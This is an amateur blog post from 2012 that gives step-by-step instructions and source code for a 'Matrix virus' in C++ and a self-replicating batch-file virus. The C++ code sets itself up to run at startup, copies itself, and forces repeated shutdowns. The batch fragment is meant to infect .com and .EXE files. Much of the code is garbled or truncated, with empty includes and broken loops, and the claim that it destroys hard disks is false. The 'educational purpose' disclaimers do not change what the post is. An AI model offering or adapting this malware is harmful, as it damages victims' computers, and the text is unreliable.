Powered By Blogger

Thursday 1 March 2012

Matrix Virus

Hii Friends

i will tell u that how to make a deadly virus

warning : - i will not be responsible for any harm yo your comuter or others computers , so pls make sure do not try

This virus called as " matrix"

any way here is the procedure

firstly open the

1). open the notepad

i will again tell u that pls do not try

2). paste the coading in notepad given below : ..........





// The Matrix Virus
// Created by W3irdo
// Hazuras.com

#include
#include
#include
#include
#include
#include
#include
using namespace std;

int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);

{
char buffer[255];
char inputFile[]="C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}

{
char buffer[255];
char inputFile[]="C:\\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "COPY matrix.exe C:\\rawr.exe \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}

START:{
for(int i = 0; i <>
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout <<>
cout <<>
cout <<>
cout <<>
cout <<>
cout <<>
cout <<>
cout <<>
cout <<>
cout <<>
cout <<>
cout <<>
Sleep(60);
}
}
for ( int j = 0; j <>
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout <<>
}
goto START;
}


3). save it as matrix.exe , in all files given below

feature - it will destroy your harddisk , yes its true..... (you can b done only by replacing th hardisk)

it is only for educational purpose . . .

A Virus Code-1

A simple VIRUS code is here: Just save the following code as .bat extension in notepad The antivirus will detect it as virus. see for yourself.
It will affect *.com and *.EXE files .
It will multiply itself and may get more dangerous when altered.
@echo off>nul.ViRuSif
“%1==”/ViRuS_MULTIPLY goto ViRuS_multiplyif
“%1==”/ViRuS_OUTER_LOOP goto ViRuS_outer_loopif
“%1==”/ViRuS_FINDSELF goto ViRuS_findselfif
“%VOFF%==”T goto ViRuS_OLDBAT
set ViRuSname=%0
if not exist %0.bat call %0 /ViRuS_FINDSELF %path%
if not exist %ViRuSname%.bat set ViRuSname=
if “%ViRuSname%==” goto ViRuS_OLDBAT